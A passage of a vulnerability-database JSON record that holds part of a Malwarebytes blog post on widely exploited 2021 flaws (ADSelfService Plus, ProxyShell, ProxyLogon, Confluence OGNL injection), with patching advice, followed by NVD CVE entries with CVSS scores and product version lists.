solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014&quot;This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.&quot;\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these &quot;requirements&quot; move it to the top of your &quot;to-patch&quot; list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T19:10:37", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T17:15:00", "type": "cve", "title": "CVE-2021-40539", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-29T17:18:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus:6.0", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.8", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.0", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.4", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.5", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.2", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.7", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.3", "cpe:/a:zohocorp:manageengine_adselfservice_plus:4.5", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.0.6", "cpe:/a:zohocorp:manageengine_adselfservice_plus:6.1", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.1", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.6"], "id": "CVE-2021-40539", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5805:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5316:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5709:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5806:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4550:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5813:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5519:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4580:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5809:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5324:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5020:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5801:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5321:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5040:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5704:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5311:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5327:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5505:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4544:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5504:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5800:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5326:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5808:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5804:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4522:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5513:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5705:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5503:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5701:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5507:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5810:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5521:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5816:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5325:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5517:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5606:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5310:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5306:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5516:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5323:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5602:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5319:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4571:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5601:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5109:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5607:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5605:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4543:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5328:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5708:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5703:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5803:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5515:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5700:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4531:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4590:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4592:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5308:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5506:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4560:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5021:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5512:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5330:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5313:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5815:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5514:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5315:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5603:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5518:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5807:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4591:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4572:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5710:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5811:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5307:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5312:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4570:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5041:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5508:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5706:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5812:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5030:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5317:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5322:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5309:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5802:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5314:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4540:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5604:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5032:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5814:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5022:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5607:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5318:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5320:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5329:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5707:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.4:5400:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5600:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5702:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5502:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:59", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T17:15:00", "type": "cve", "title": "CVE-2020-10189", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-09T14:15:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10"], "id": "CVE-2020-10189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-30T15:23:04", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 